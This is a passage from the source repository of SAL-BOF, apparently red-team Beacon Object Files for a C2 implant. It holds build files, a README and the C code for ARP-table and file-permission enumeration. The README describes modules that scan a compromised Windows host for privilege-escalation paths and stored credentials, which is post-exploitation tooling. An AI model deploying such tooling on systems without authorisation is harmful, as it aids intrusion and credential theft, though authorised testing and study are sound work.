    COMMENT "Copying tokenpriv object file"
)

add_custom_target(copy_unattendfiles ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:unattendfiles> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/unattendfiles.x64.o
    DEPENDS unattendfiles
    COMMENT "Copying unattendfiles object file"
)

add_custom_target(copy_unquotedsvc ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:unquotedsvc> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/unquotedsvc.x64.o
    DEPENDS unquotedsvc
    COMMENT "Copying unquotedsvc object file"
)

add_custom_target(copy_autologon ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:autologon> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/autologon.x64.o
    DEPENDS autologon
    COMMENT "Copying autologon object file"
)

add_custom_target(copy_credmanager ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:credmanager> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/credmanager.x64.o
    DEPENDS credmanager
    COMMENT "Copying credmanager object file"
)

add_custom_target(copy_modautorun ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:modautorun> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/modautorun.x64.o
    DEPENDS modautorun
    COMMENT "Copying modautorun object file"
)

add_custom_target(copy_modsvc ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:modsvc> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/modsvc.x64.o
    DEPENDS modsvc
    COMMENT "Copying modsvc object file"
)

add_custom_target(copy_pshistory ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:pshistory> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/pshistory.x64.o
    DEPENDS pshistory
    COMMENT "Copying pshistory object file"
)

add_custom_target(copy_uacstatus ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:uacstatus> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/uacstatus.x64.o
    DEPENDS uacstatus
    COMMENT "Copying uacstatus object file"
)

add_custom_target(copy_privcheck_all ALL
    COMMAND ${CMAKE_COMMAND} -E copy $<TARGET_OBJECTS:privcheck_all> ${CMAKE_CURRENT_SOURCE_DIR}/_bin/privcheck_all.x64.o
    DEPENDS privcheck_all
    COMMENT "Copying privcheck_all object file"
)


================================================
FILE: SAL-BOF/Makefile
================================================
CC64 = x86_64-w64-mingw32-gcc
CC86 = i686-w64-mingw32-gcc
STRIP64 = x86_64-w64-mingw32-strip --strip-unneeded
STRIP86 = i686-w64-mingw32-strip --strip-unneeded
CFLAGS = -I ../_include -w -Wno-incompatible-pointer-types -Os -DBOF -c

all: bof

bof: clean
	@(mkdir _bin 2>/dev/null) && echo 'creating _bin directory' || echo '_bin directory exists'
	# 64-bit builds
	@($(CC64) $(CFLAGS) arp/arp.c -o _bin/arp.x64.o && $(STRIP64) _bin/arp.x64.o) && echo '[+] arp x64' || echo '[!] arp x64'
	@($(CC64) $(CFLAGS) cacls/cacls.c -o _bin/cacls.x64.o && $(STRIP64) _bin/cacls.x64.o) && echo '[+] cacls x64' || echo '[!] cacls x64'
	@($(CC64) $(CFLAGS) dir/dir.c -o _bin/dir.x64.o && $(STRIP64) _bin/dir.x64.o) && echo '[+] dir x64' || echo '[!] dir x64'
	@($(CC64) $(CFLAGS) env/env.c -o _bin/env.x64.o && $(STRIP64) _bin/env.x64.o) && echo '[+] env x64' || echo '[!] env x64'
	@($(CC64) $(CFLAGS) ipconfig/ipconfig.c -o _bin/ipconfig.x64.o && $(STRIP64) _bin/ipconfig.x64.o) && echo '[+] ipconfig x64' || echo '[!] ipconfig x64'
	@($(CC64) $(CFLAGS) listdns/listdns.c -o _bin/listdns.x64.o && $(STRIP64) _bin/listdns.x64.o) && echo '[+] listdns x64' || echo '[!] listdns x64'
	@($(CC64) $(CFLAGS) netstat/netstat.c -o _bin/netstat.x64.o && $(STRIP64) _bin/netstat.x64.o) && echo '[+] netstat x64' || echo '[!] netstat x64'
	@($(CC64) $(CFLAGS) -fno-jump-tables nslookup/nslookup.c -o _bin/nslookup.x64.o && $(STRIP64) _bin/nslookup.x64.o) && echo '[+] nslookup x64' || echo '[!] nslookup x64'
	@($(CC64) $(CFLAGS) routeprint/routeprint.c -o _bin/routeprint.x64.o && $(STRIP64) _bin/routeprint.x64.o) && echo '[+] routeprint x64' || echo '[!] routeprint x64'
	@($(CC64) $(CFLAGS) uptime/uptime.c -o _bin/uptime.x64.o && $(STRIP64) _bin/uptime.x64.o) && echo '[+] uptime x64' || echo '[!] uptime x64'
	@($(CC64) $(CFLAGS) useridletime/useridletime.c -o _bin/useridletime.x64.o && $(STRIP64) _bin/useridletime.x64.o) && echo '[+] useridletime x64' || echo '[!] useridletime x64'
	@($(CC64) $(CFLAGS) whoami/whoami.c -o _bin/whoami.x64.o && $(STRIP64) _bin/whoami.x64.o) && echo '[+] whoami x64' || echo '[!] whoami x64'
	@(python3 ./privcheck/download_vulnerable_driver_list.py)
	@($(CC64) $(CFLAGS) privcheck/vulnerabledrivers.c -o _bin/vulndrivers.x64.o && $(STRIP64) _bin/vulndrivers.x64.o) && echo '[+] vulndrivers x64' || echo '[!] vulndrivers x64'
	@($(CC64) $(CFLAGS) privcheck/alwaysinstallelevated.c -o _bin/alwayselevated.x64.o && $(STRIP64) _bin/alwayselevated.x64.o) && echo '[+] alwayselevated x64' || echo '[!] alwayselevated x64'
	@($(CC64) $(CFLAGS) privcheck/hijackablepath.c -o _bin/hijackablepath.x64.o && $(STRIP64) _bin/hijackablepath.x64.o) && echo '[+] hijackablepath x64' || echo '[!] hijackablepath x64'
	@($(CC64) $(CFLAGS) privcheck/tokenprivileges.c -o _bin/tokenpriv.x64.o && $(STRIP64) _bin/tokenpriv.x64.o) && echo '[+] tokenpriv x64' || echo '[!] tokenpriv x64'
	@($(CC64) $(CFLAGS) privcheck/unattendfiles.c -o _bin/unattendfiles.x64.o && $(STRIP64) _bin/unattendfiles.x64.o) && echo '[+] unattendfiles x64' || echo '[!] unattendfiles x64'
	@($(CC64) $(CFLAGS) privcheck/unquotedsvcpath.c -o _bin/unquotedsvc.x64.o && $(STRIP64) _bin/unquotedsvc.x64.o) && echo '[+] unquotedsvc x64' || echo '[!] unquotedsvc x64'
	@($(CC64) $(CFLAGS) privcheck/autologon.c -o _bin/autologon.x64.o && $(STRIP64) _bin/autologon.x64.o) && echo '[+] autologon x64' || echo '[!] autologon x64'
	@($(CC64) $(CFLAGS) privcheck/credentialmanager.c -o _bin/credmanager.x64.o && $(STRIP64) _bin/credmanager.x64.o) && echo '[+] credmanager x64' || echo '[!] credmanager x64'
	@($(CC64) $(CFLAGS) privcheck/modifiableautorun.c -o _bin/modautorun.x64.o && $(STRIP64) _bin/modautorun.x64.o) && echo '[+] modautorun x64' || echo '[!] modautorun x64'
	@($(CC64) $(CFLAGS) privcheck/modifiablesvc.c -o _bin/modsvc.x64.o && $(STRIP64) _bin/modsvc.x64.o) && echo '[+] modsvc x64' || echo '[!] modsvc x64'
	@($(CC64) $(CFLAGS) privcheck/pshistory.c -o _bin/pshistory.x64.o && $(STRIP64) _bin/pshistory.x64.o) && echo '[+] pshistory x64' || echo '[!] pshistory x64'
	@($(CC64) $(CFLAGS) privcheck/uacstatus.c -o _bin/uacstatus.x64.o && $(STRIP64) _bin/uacstatus.x64.o) && echo '[+] uacstatus x64' || echo '[!] uacstatus x64'
	@($(CC64) $(CFLAGS) privcheck/privcheck_all.c -o _bin/privcheck_all.x64.o && $(STRIP64) _bin/privcheck_all.x64.o) && echo '[+] privcheck_all x64' || echo '[!] privcheck_all x64'

	# 32-bit builds
	@($(CC86) $(CFLAGS) arp/arp.c -o _bin/arp.x32.o && $(STRIP86) _bin/arp.x32.o) && echo '[+] arp x32' || echo '[!] arp x32'
	@($(CC86) $(CFLAGS) cacls/cacls.c -o _bin/cacls.x32.o && $(STRIP86) _bin/cacls.x32.o) && echo '[+] cacls x32' || echo '[!] cacls x32'
	@($(CC86) $(CFLAGS) dir/dir.c -o _bin/dir.x32.o && $(STRIP86) _bin/dir.x32.o) && echo '[+] dir x32' || echo '[!] dir x32'
	@($(CC86) $(CFLAGS) env/env.c -o _bin/env.x32.o && $(STRIP86) _bin/env.x32.o) && echo '[+] env x32' || echo '[!] env x32'
	@($(CC86) $(CFLAGS) ipconfig/ipconfig.c -o _bin/ipconfig.x32.o && $(STRIP86) _bin/ipconfig.x32.o) && echo '[+] ipconfig x32' || echo '[!] ipconfig x32'
	@($(CC86) $(CFLAGS) listdns/listdns.c -o _bin/listdns.x32.o && $(STRIP86) _bin/listdns.x32.o) && echo '[+] listdns x32' || echo '[!] listdns x32'
	@($(CC86) $(CFLAGS) netstat/netstat.c -o _bin/netstat.x32.o && $(STRIP86) _bin/netstat.x32.o) && echo '[+] netstat x32' || echo '[!] netstat x32'
	@#($(CC86) $(CFLAGS) -fno-jump-tables nslookup/nslookup.c -o _bin/nslookup.x32.o && $(STRIP86) _bin/nslookup.x32.o) && echo '[+] nslookup x32' || echo '[!] nslookup x32'
	@($(CC86) $(CFLAGS) routeprint/routeprint.c -o _bin/routeprint.x32.o && $(STRIP86) _bin/routeprint.x32.o) && echo '[+] routeprint x32' || echo '[!] routeprint x32'
	@($(CC86) $(CFLAGS) uptime/uptime.c -o _bin/uptime.x32.o && $(STRIP86) _bin/uptime.x32.o) && echo '[+] uptime x32' || echo '[!] uptime x32'
	@($(CC86) $(CFLAGS) useridletime/useridletime.c -o _bin/useridletime.x32.o && $(STRIP86) _bin/useridletime.x32.o) && echo '[+] useridletime x32' || echo '[!] useridletime x32'
	@($(CC86) $(CFLAGS) whoami/whoami.c -o _bin/whoami.x32.o && $(STRIP86) _bin/whoami.x32.o) && echo '[+] whoami x32' || echo '[!] whoami x32'
	@($(CC86) $(CFLAGS) privcheck/vulnerabledrivers.c -o _bin/vulndrivers.x32.o && $(STRIP86) _bin/vulndrivers.x32.o) && echo '[+] vulndrivers x32' || echo '[!] vulndrivers x32'
	@($(CC86) $(CFLAGS) privcheck/alwaysinstallelevated.c -o _bin/alwayselevated.x32.o && $(STRIP86) _bin/alwayselevated.x32.o) && echo '[+] alwayselevated x32' || echo '[!] alwayselevated x32'
	@($(CC86) $(CFLAGS) privcheck/hijackablepath.c -o _bin/hijackablepath.x32.o && $(STRIP86) _bin/hijackablepath.x32.o) && echo '[+] hijackablepath x32' || echo '[!] hijackablepath x32'
	@($(CC86) $(CFLAGS) privcheck/tokenprivileges.c -o _bin/tokenpriv.x32.o && $(STRIP86) _bin/tokenpriv.x32.o) && echo '[+] tokenpriv x32' || echo '[!] tokenpriv x32'
	@($(CC86) $(CFLAGS) privcheck/unattendfiles.c -o _bin/unattendfiles.x32.o && $(STRIP86) _bin/unattendfiles.x32.o) && echo '[+] unattendfiles x32' || echo '[!] unattendfiles x32'
	@($(CC86) $(CFLAGS) privcheck/unquotedsvcpath.c -o _bin/unquotedsvc.x32.o && $(STRIP86) _bin/unquotedsvc.x32.o) && echo '[+] unquotedsvc x32' || echo '[!] unquotedsvc x32'
	@($(CC86) $(CFLAGS) privcheck/autologon.c -o _bin/autologon.x32.o && $(STRIP86) _bin/autologon.x32.o) && echo '[+] autologon x32' || echo '[!] autologon x32'
	@($(CC86) $(CFLAGS) privcheck/credentialmanager.c -o _bin/credmanager.x32.o && $(STRIP86) _bin/credmanager.x32.o) && echo '[+] credmanager x32' || echo '[!] credmanager x32'
	@($(CC86) $(CFLAGS) privcheck/modifiableautorun.c -o _bin/modautorun.x32.o && $(STRIP86) _bin/modautorun.x32.o) && echo '[+] modautorun x32' || echo '[!] modautorun x32'
	@($(CC86) $(CFLAGS) privcheck/modifiablesvc.c -o _bin/modsvc.x32.o && $(STRIP86) _bin/modsvc.x32.o) && echo '[+] modsvc x32' || echo '[!] modsvc x32'
	@($(CC86) $(CFLAGS) privcheck/pshistory.c -o _bin/pshistory.x32.o && $(STRIP86) _bin/pshistory.x32.o) && echo '[+] pshistory x32' || echo '[!] pshistory x32'
	@($(CC86) $(CFLAGS) privcheck/uacstatus.c -o _bin/uacstatus.x32.o && $(STRIP86) _bin/uacstatus.x32.o) && echo '[+] uacstatus x32' || echo '[!] uacstatus x32'
	@($(CC86) $(CFLAGS) privcheck/privcheck_all.c -o _bin/privcheck_all.x32.o && $(STRIP86) _bin/privcheck_all.x32.o) && echo '[+] privcheck_all x32' || echo '[!] privcheck_all x32'
clean:
	@(rm -rf _bin)


================================================
FILE: SAL-BOF/README.md
================================================
# SAL-BOF

This extension enhances situational awareness by providing a set of local Beacon Object File (BOF) commands. These commands allow the operator to gather detailed information about the target system's network configuration, file access control, environment variables, and other critical system details.

![](_img/01.png)

## arp

List ARP table

```
arp
```

## cacls

List user permissions for the specified file or directory, wildcards supported

```
cacls <path>
```

## dir

Lists files in a specified directory. Supports wildcards (e.g. "C:\Windows\S*"). Optionally, it can perform a recursive list with the `/s` argument

```
dir <path> [/s]
```

## env

List process environment variables

```
env
```

## ipconfig

List IPv4 address, hostname, and DNS server

```
ipconfig
```

## listdns

List DNS cache entries. Attempt to query and resolve each

```
listdns
```

## nslookup

Make a DNS query

```
nslookup <domain> [server] [type>]
```

# privcheck

BOFs to detect common privilege escalation paths in Windows. This is taken from [ostrichgolf/PrivCheck](https://github.com/ostrichgolf/PrivCheck) which was originally forked from [mertdas/PrivKit](https://github.com/mertdas/PrivKit). PrivCheck currently includes the following modules:

```
privcheck <module>
```

| Module           | Description                                                  |
| ---------------- | ------------------------------------------------------------ |
| `alwayselevated` | Checks if `Always Install Elevated` is enabled using the registry. |
| `hijackablepath` | Checks the path environment variable for writable directories (`FILE_ADD_FILE`) that can be exploited to elevate privileges. |
| `tokenpriv`      | Lists the current token privileges and highlights known vulnerable ones. |
| `unattendfiles`  | Checks for leftover unattend files that might contain sensitive information. |
| `unquotedsvc`    | Checks for unquoted service paths.                           |
| `vulndrivers`    | Checks if any service on the system uses a known vulnerable driver (based on loldrivers.io).  *The list of vulnerable drivers is downloaded from `loldrivers.io` during compilation, then baked into the BOF. Recompile periodically to update* . |



## routeprint

List IPv4 routes

```
routeprint
``` 

## uptime

List system uptime

```
uptime
```

## useridletime

Shows how long the user as been idle, displayed in seconds, minutes, hours and days.

```
useridletime
```

## whoami

List whoami /all

```
whoami
```



## Credits
* CS-Situational-Awareness-BOF - https://github.com/trustedsec/CS-Situational-Awareness-BOF
* PrivCheck - https://github.com/ostrichgolf/PrivCheck
* C2-Tool-Collection - https://github.com/outflanknl/C2-Tool-Collection/

================================================
FILE: SAL-BOF/arp/arp.c
================================================
#include <windows.h>
#include <iphlpapi.h>
#include "bofdefs.h"
#include "base.c"

//DECLSPEC_IMPORT ULONG WINAPI IPHLPAPI$GetIpNetTable(PMIB_IPNETTABLE IpNetTable,PULONG SizePointer, BOOL Order);

void print_ip_from_int(unsigned int addr)
{
        unsigned char p1, p2, p3, p4;
		char ipStr[20] = {0};

        p1 = (addr & 0x000000FF);
        p2 = (addr & 0x0000FF00) >> 8;
        p3 = (addr & 0x00FF0000) >> 16;
        p4 = (addr & 0xFF000000) >> 24;

		MSVCRT$sprintf(ipStr,"%d.%d.%d.%d", p1,p2,p3,p4);
		internal_printf("%-24s", ipStr);
}

void print_MAC_from_bytes(DWORD length, BYTE* physaddr)
{
	char macStr[24] = {0};
	if(length != 6)
	{
		internal_printf("%-24s", "INVALID MAC LENGTH");
		return;
	}
	MSVCRT$sprintf(macStr, "%02X-%02X-%02X-%02X-%02X-%02X",physaddr[0],physaddr[1],physaddr[2],physaddr[3],physaddr[4],physaddr[5]);
	internal_printf("%-24s",macStr);
}


char* int_to_arp_type(DWORD arp_type)
{
	if(arp_type == 1)
	{
		return "other";
	}else if(arp_type == 2)
	{
		return "invalid";
	}else if(arp_type == 3)
	{
		return "dynamic";
	}else if(arp_type == 4)
	{
		return "static";
	}else
	{
		return "unknown";
	}

}


void arp()
{
	ULONG ret;
	MIB_IPNETTABLE *ipNetTableInfo = NULL;
	MIB_IPNETROW *row;
	ULONG ipNetTableBufLen = 0;
	DWORD p = 0;
	DWORD last_if_index = 0;
	IPHLPAPI$GetIpNetTable(NULL, &ipNetTableBufLen, TRUE);
	ipNetTableInfo = intAlloc(ipNetTableBufLen);
	if (NULL == ipNetTableInfo)
	{
		BeaconPrintf(CALLBACK_ERROR, "Could not alloc memory for ipNetTableInfo");
		goto END;
	}
	ret = IPHLPAPI$GetIpNetTable(ipNetTableInfo, &ipNetTableBufLen, TRUE);
	if ((ret != NO_ERROR) && (ret != ERROR_NO_DATA))
	{
		BeaconPrintf(CALLBACK_ERROR, "Error code: %d", ret);
		BeaconPrintf(CALLBACK_ERROR, "Could not get ipnet table info");
		goto END;
	}	
	row = ipNetTableInfo->table;
	for (p=0; p < ipNetTableInfo->dwNumEntries; p++)
	{
		if (last_if_index != row->dwIndex)
		{
			last_if_index = row->dwIndex;
			internal_printf("\nInteface  --- 0x%X\n",row->dwIndex);
			internal_printf("%-24s%-24s%-24s\n","Internet Address","Physical Address", "Type");
		}
		
		print_ip_from_int(row->dwAddr);

		if (row->dwPhysAddrLen > 0)
		{
			print_MAC_from_bytes(row->dwPhysAddrLen,row->bPhysAddr);
		}
		else
		{
			internal_printf("%-24s","");
		}

		internal_printf("%-24s\n",int_to_arp_type(row->dwType));
		row++;
	}


	END:
		if(ipNetTableInfo){ intFree(ipNetTableInfo);}	
}

VOID go( 
	IN PCHAR Buffer, 
	IN ULONG Length 
) 
{
	if(!bofstart())
	{
		return;
	}
	arp();
	printoutput(TRUE);
};


================================================
FILE: SAL-BOF/arp/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/cacls/base.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "beacon.h"
#ifndef bufsize
#define bufsize 8192
#endif


char * output __attribute__((section (".data"))) = 0;  // this is just done so its we don't go into .bss which isn't handled properly
WORD currentoutsize __attribute__((section (".data"))) = 0;
HANDLE trash __attribute__((section (".data"))) = NULL; // Needed for x64 to not give relocation error

#ifdef BOF
int bofstart();
void internal_printf(const char* format, ...);
void printoutput(BOOL done);
#endif
char * Utf16ToUtf8(const wchar_t* input);

int bofstart()
{   
    output = (char*)MSVCRT$calloc(bufsize, 1);
    currentoutsize = 0;
    return 1;
}

void internal_printf(const char* format, ...){
    int buffersize = 0;
    int transfersize = 0;
    char * curloc = NULL;
    char* intBuffer = NULL;
    va_list args;
    va_start(args, format);
    buffersize = MSVCRT$vsnprintf(NULL, 0, format, args); // +1 because vsprintf goes to buffersize-1 , and buffersize won't return with the null
    va_end(args);
    
    // vsnprintf will return -1 on encoding failure (ex. non latin characters in Wide string)
    if (buffersize == -1)
        return;
    
    char* transferBuffer = (char*)intAlloc(bufsize);
    intBuffer = (char*)intAlloc(buffersize);
    /*Print string to memory buffer*/
    va_start(args, format);
    MSVCRT$vsnprintf(intBuffer, buffersize, format, args); // tmpBuffer2 has a null terminated string
    va_end(args);
    if(buffersize + currentoutsize < bufsize) // If this print doesn't overflow our output buffer, just buffer it to the end
    {
        //BeaconFormatPrintf(&output, intBuffer);
        memcpy(output+currentoutsize, intBuffer, buffersize);
        currentoutsize += buffersize;
    }
    else // If this print does overflow our output buffer, lets print what we have and clear any thing else as it is likely this is a large print
    {
        curloc = intBuffer;
        while(buffersize > 0)
        {
            transfersize = bufsize - currentoutsize; // what is the max we could transfer this request
            if(buffersize < transfersize) //if I have less then that, lets just transfer what's left
            {
                transfersize = buffersize;
            }
            memcpy(output+currentoutsize, curloc, transfersize); // copy data into our transfer buffer
            currentoutsize += transfersize;
            if(currentoutsize == bufsize)
            {
            printoutput(FALSE); // sets currentoutsize to 0 and prints
            }
            memset(transferBuffer, 0, transfersize); // reset our transfer buffer
            curloc += transfersize; // increment by how much data we just wrote
            buffersize -= transfersize; // subtract how much we just wrote from how much we are writing overall
        }
    }
    intFree(intBuffer);
    intFree(transferBuffer);
}

void printoutput(BOOL done)
{

    char * msg = NULL;
    BeaconOutput(CALLBACK_OUTPUT, output, currentoutsize);
    currentoutsize = 0;
    memset(output, 0, bufsize);
    if(done) {MSVCRT$free(output); output=NULL;}
}


#ifdef DYNAMIC_LIB_COUNT


typedef struct loadedLibrary {
    HMODULE hMod; // mod handle
    const char * name; // name normalized to uppercase
}loadedLibrary, *ploadedLibrary;
loadedLibrary loadedLibraries[DYNAMIC_LIB_COUNT] __attribute__((section (".data"))) = {0};
DWORD loadedLibrariesCount __attribute__((section (".data"))) = 0;

BOOL intstrcmp(LPCSTR szLibrary, LPCSTR sztarget)
{
    BOOL bmatch = FALSE;
    DWORD pos = 0;
    while(szLibrary[pos] && sztarget[pos])
    {
        if(szLibrary[pos] != sztarget[pos])
        {
            goto end;
        }
        pos++;
    }
    if(szLibrary[pos] | sztarget[pos]) // if either of these down't equal null then they can't match
        {goto end;}
    bmatch = TRUE;

    end:
    return bmatch;
}

FARPROC DynamicLoad(const char * szLibrary, const char * szFunction)
{
    FARPROC fp = NULL;
    HMODULE hMod = NULL;
    DWORD i = 0;
    DWORD liblen = 0;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        if(intstrcmp(szLibrary, loadedLibraries[i].name))
        {
            hMod = loadedLibraries[i].hMod;
        }
    }
    if(!hMod)
    {
        hMod = LoadLibraryA(szLibrary);
        if(!hMod){ 
            BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\nCould not find library to load.", szLibrary);
            return NULL;
        }
        loadedLibraries[loadedLibrariesCount].hMod = hMod;
        loadedLibraries[loadedLibrariesCount].name = szLibrary; //And this is why this HAS to be a constant or not freed before bofstop
        loadedLibrariesCount++;
    }
    fp = GetProcAddress(hMod, szFunction);

    if (NULL == fp)
    {
        BeaconPrintf(CALLBACK_ERROR, "*** DynamicLoad(%s) FAILED!\n", szFunction);
    }
    return fp;
}
#endif


char* Utf16ToUtf8(const wchar_t* input)
{
    int ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        NULL,
        0,
        NULL,
        NULL
    );

    char* newString = (char*)intAlloc(sizeof(char) * ret);

    ret = KERNEL32$WideCharToMultiByte(
        CP_UTF8,
        0,
        input,
        -1,
        newString,
        sizeof(char) * ret,
        NULL,
        NULL
    );

    if (0 == ret)
    {
        goto fail;
    }

retloc:
    return newString;
/*location to free everything centrally*/
fail:
    if (newString){
        intFree(newString);
        newString = NULL;
    };
    goto retloc;
}

//release any global functions here
void bofstop()
{
#ifdef DYNAMIC_LIB_COUNT
    DWORD i;
    for(i = 0; i < loadedLibrariesCount; i++)
    {
        FreeLibrary(loadedLibraries[i].hMod);
    }
#endif
	return;
}


================================================
FILE: SAL-BOF/cacls/cacls.c
================================================
#include <windows.h>
#include "bofdefs.h"
#include "defines.h"
#include "base.c"
#include <sddl.h>
#include <windef.h>

enum searchtype{
    File,
    Folder,
    Fail
};
#pragma pack (push, 1) // This is required because x64 can crash when running as a bof otherwise.
typedef struct _AR
{
    DWORD Access;
    const char * uID;
}AR, *pAR;
#pragma pack (pop)
pAR AccessRights = (pAR)1;

#define LOVEIT(a, b, c) a.Access = b; a.uID = c

void ConvertUnicodeStringToChar(const wchar_t* src, size_t srcSize, char* dst, size_t dstSize)
{
    KERNEL32$WideCharToMultiByte(CP_ACP, 0, src, (int)srcSize, dst, (int)dstSize, NULL, NULL);
    dst[dstSize - 1] = '\0';
}

void LovingIt() // Fix bof's inability to handle initialized ** type values
{
    AccessRights = (pAR)intAlloc(26 * sizeof(AR));
    LOVEIT(AccessRights[0], FILE_WRITE_ATTRIBUTES, IDS_FILE_WRITE_ATTRIBUTES);
    LOVEIT(AccessRights[1], FILE_READ_ATTRIBUTES, IDS_FILE_READ_ATTRIBUTES);
    LOVEIT(AccessRights[2], FILE_DELETE_CHILD, IDS_FILE_DELETE_CHILD);
    LOVEIT(AccessRights[3], FILE_EXECUTE, IDS_FILE_EXECUTE);
    LOVEIT(AccessRights[4], FILE_WRITE_EA, IDS_FILE_WRITE_EA);
    LOVEIT(AccessRights[5], FILE_READ_EA, IDS_FILE_READ_EA);
    LOVEIT(AccessRights[6], FILE_APPEND_DATA, IDS_FILE_APPEND_DATA);
    LOVEIT(AccessRights[7], FILE_WRITE_DATA, IDS_FILE_WRITE_DATA);
    LOVEIT(AccessRights[8], FILE_READ_DATA, IDS_FILE_READ_DATA);
    LOVEIT(AccessRights[9], FILE_GENERIC_EXECUTE, IDS_FILE_GENERIC_EXECUTE);
    LOVEIT(AccessRights[10], FILE_GENERIC_WRITE, IDS_FILE_GENERIC_WRITE);
    LOVEIT(AccessRights[11], FILE_GENERIC_READ, IDS_FILE_GENERIC_READ);
